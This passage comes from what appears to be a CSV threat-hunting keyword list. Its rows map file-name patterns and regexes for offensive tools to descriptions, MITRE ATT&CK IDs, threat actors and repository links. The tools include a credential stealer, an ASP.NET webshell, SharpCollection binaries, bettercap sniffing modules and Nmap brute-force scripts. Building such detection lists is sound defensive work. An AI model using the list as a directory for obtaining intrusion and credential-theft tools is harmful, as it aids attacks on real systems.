TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9039" "*/Necro-Stealer.git*",".{0,1000}\/Necro\-Stealer\.git.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","9040" "*/Needle_Sift_BOF/*",".{0,1000}\/Needle_Sift_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - 
Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","9041" "*/Nemesis.git*",".{0,1000}\/Nemesis\.git.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9042" "*/nemesis_connector.py*",".{0,1000}\/nemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9043" "*/nemesis_db.py*",".{0,1000}\/nemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9044" "*/nemesis_reg_collect_parser.py*",".{0,1000}\/nemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9045" "*/nemesis-cli.py*",".{0,1000}\/nemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","9046" "*/nessus.py*",".{0,1000}\/nessus\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9052" "*/nessus.rb*",".{0,1000}\/nessus\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9053" "*/nessus-brute.nse*",".{0,1000}\/nessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9054" "*/nessus-xmlrpc-brute.nse*",".{0,1000}\/nessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9055" "*/net_4.0_32_RunasCs.exe*",".{0,1000}\/net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9056" "*/net_4.0_32SharpDoor.exe*",".{0,1000}\/net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9057" "*/net_4.0_32sharpfiles.exe*",".{0,1000}\/net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9058" "*/net_4.0_64_RunasCs.exe*",".{0,1000}\/net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9059" "*/net_4.0_64SharpDoor.exe*",".{0,1000}\/net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9060" "*/net_4.0_64sharpfiles.exe*",".{0,1000}\/net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9061" "*/net_4.0_Any_RunasCs.exe*",".{0,1000}\/net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9062" "*/net_4.0_AnySharpDoor.exe*",".{0,1000}\/net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9063" "*/net_4.0_Anysharpfiles.exe*",".{0,1000}\/net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9064" "*/net_4.5_32_RunasCs.exe*",".{0,1000}\/net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9065" "*/net_4.5_32SharpDoor.exe*",".{0,1000}\/net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9066" "*/net_4.5_32sharpfiles.exe*",".{0,1000}\/net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9067" "*/net_4.5_64_RunasCs.exe*",".{0,1000}\/net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9068" "*/net_4.5_64SharpDoor.exe*",".{0,1000}\/net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9069" "*/net_4.5_64sharpfiles.exe*",".{0,1000}\/net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9070" "*/net_4.5_Any_RunasCs.exe*",".{0,1000}\/net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9071" "*/net_4.5_AnySharpDoor.exe*",".{0,1000}\/net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9072" "*/net_4.5_Anysharpfiles.exe*",".{0,1000}\/net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9073" "*/net_4.7_32_RunasCs.exe*",".{0,1000}\/net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9074" "*/net_4.7_64_RunasCs.exe*",".{0,1000}\/net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9075" "*/net_4.7_Any_RunasCs.exe*",".{0,1000}\/net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","9076" "*/net_portscan.py*",".{0,1000}\/net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","9077" "*/net_recon/*",".{0,1000}\/net_recon\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9078" "*/net_sniff.*",".{0,1000}\/net_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9079" "*/net_sniff_*.*",".{0,1000}\/net_sniff_.{0,1000}\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9080" "*/NETAMSI.ps1*",".{0,1000}\/NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","9081" "*/netbus-auth-bypass.nse*",".{0,1000}\/netbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9082" "*/netbus-brute.nse*",".{0,1000}\/netbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
